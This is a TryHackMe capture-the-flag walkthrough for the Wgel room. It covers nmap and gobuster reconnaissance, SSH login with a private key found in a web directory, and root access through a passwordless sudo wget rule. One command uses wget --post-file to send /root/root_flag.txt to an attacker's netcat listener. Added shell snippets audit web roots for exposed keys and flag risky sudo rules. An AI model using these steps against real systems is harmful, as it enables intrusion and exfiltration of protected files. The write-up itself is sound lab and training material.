
Wgel CTF

 

TryHackMe - Wgel CTF

 

NMAP - network mapper

The first thing we are going to do is a general nmap (network mapper) scan, so that we know how many ports are open.

# nmap -sT -vv -sC -sV <ip>

 



HTTP

Summary of nmap:

We see that 2 ports are open: 80 and 22. Port 22 is used for SSH, so we know that we can connect through SSH. Port 80 is for HTTP, which means the host is serving a website, so let's open that IP in our browser.

 



gobuster

It looks like an Apache2 server, so I quickly got the idea of brute-forcing the website with some common extensions. To brute-force paths and extensions on a website we use a tool called gobuster.

command:- gobuster dir -u <site URL> -w <word list> -x <extn>


root@:~# gobuster dir -u http://10.10.116.173/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q 
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)

 

Here we found a directory at /sitemap, so I opened it and found this.

 


 

Let's check whether there are any directories under it.

 

root@:~# gobuster dir -u http://10.10.116.173/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q 
/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)


We found a .ssh directory. I opened it and found an id_rsa file, which was interesting.

 

Here is the id_rsa key:


Then remember that at the start we saw that an SSH connection was possible. Checking the source code of the first web page, we found a username: jessie.
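The finding above comes down to a private key sitting inside the web server's document root. As an added example (not part of the original post), this POSIX shell function audits a document root for credential directories and private-key files; the sample tree is constructed to mirror the /sitemap/.ssh/id_rsa layout, and the directory names checked are an assumption about what you consider sensitive.

```shell
#!/bin/sh
# Added example: flag credential material that a web server would serve.

audit_webroot() {
    docroot=$1
    findings=$(
        # Hidden directories that hold credentials or repository metadata.
        find "$docroot" -type d \( -name .ssh -o -name .git -o -name .aws \) \
            -exec printf 'DIR %s\n' {} \;
        # Files containing a PEM or OpenSSH private-key header, whatever their name.
        find "$docroot" -type f \
            -exec grep -l -E -e '-----BEGIN ([A-Z]+ )?PRIVATE KEY-----' {} + |
            sed 's/^/KEY /'
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1                      # non-zero exit so it can gate a deploy job
}

# Constructed sample docroot; the key body is a placeholder, not a real key.
make_sample_docroot() {
    root=$(mktemp -d)
    mkdir -p "$root/sitemap/.ssh" "$root/sitemap/css"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'constructed-placeholder' \
        '-----END RSA PRIVATE KEY-----' > "$root/sitemap/.ssh/id_rsa"
    echo '<h1>It works</h1>' > "$root/index.html"
    printf '%s\n' "$root"
}

sample=$(make_sample_docroot)
audit_webroot "$sample" || echo "remove the files listed above and rotate the key"
rm -rf "$sample"
```

Any key this check finds should be treated as compromised and replaced, since removing the file does not undo earlier downloads.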

 


 

 

 

user_flag.txt

Make sure you set proper permissions on the id_rsa file; ssh refuses to use a private key that other users can read.

# chmod 600 id_rsa

Then run this command to connect:

# ssh -i id_rsa jessie@<ipaddress>

 


 


root_flag.txt  

For privilege escalation, we first run sudo -l to see what is available. I found that it needs no password, so we cannot create a payload for the root user. Then I got the idea of exploiting this vulnerability, so I set up a listener:

# nc -lvnp 4444

on my machine, i.e. the attacker's machine.

Let's check the GTFOBins entry for wget: https://gtfobins.github.io/gtfobins/wget/

command : sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4444



Then we go back to netcat,

# nc -lvnp 4444

and the root flag shows up in the listener's output.
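The root step works because a passwordless sudo rule covers a binary that can read and send arbitrary files. As an added example (not part of the original post), this shell function reads `sudo -l` output and flags such rules; the sample output is constructed, and the binary list is an illustrative assumption with wget being the one this walkthrough used.

```shell
#!/bin/sh
# Added example: triage NOPASSWD rules in `sudo -l` output.

# Binaries that can read or transmit arbitrary files when run as root.
# Illustrative and incomplete; extend it from the GTFOBins sudo list.
RISKY_BINS="wget curl tar cp cat vim find nc"

flag_nopasswd() {
    awk -v risky="$RISKY_BINS" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
        /NOPASSWD:/ {
            match($0, /\([^)]*\)/)                 # the (runas) specification
            runas = substr($0, RSTART, RLENGTH)
            sub(/^.*NOPASSWD:[ \t]*/, "")          # keep only the command list
            m = split($0, cmds, /,[ \t]*/)
            for (i = 1; i <= m; i++) {
                split(cmds[i], words, " ")         # words[1] is the binary path
                k = split(words[1], parts, "/")
                name = parts[k]
                if (words[1] == "ALL")
                    print "HIGH " runas " ALL without a password"
                else if (name in bad)
                    print "HIGH " runas " " cmds[i] " (can read or send files as root)"
                else
                    print "REVIEW " runas " " cmds[i]
            }
        }'
}

# Constructed sample of `sudo -l` output; the host name is a placeholder.
SAMPLE_SUDO_L='User jessie may run the following commands on host:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
    (root) NOPASSWD: /usr/bin/systemctl status nginx, /usr/bin/curl'

printf '%s\n' "$SAMPLE_SUDO_L" | flag_nopasswd
```

Each HIGH line is a sudoers rule to remove or to replace with a narrowly scoped wrapper script owned by root.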

 

 

 




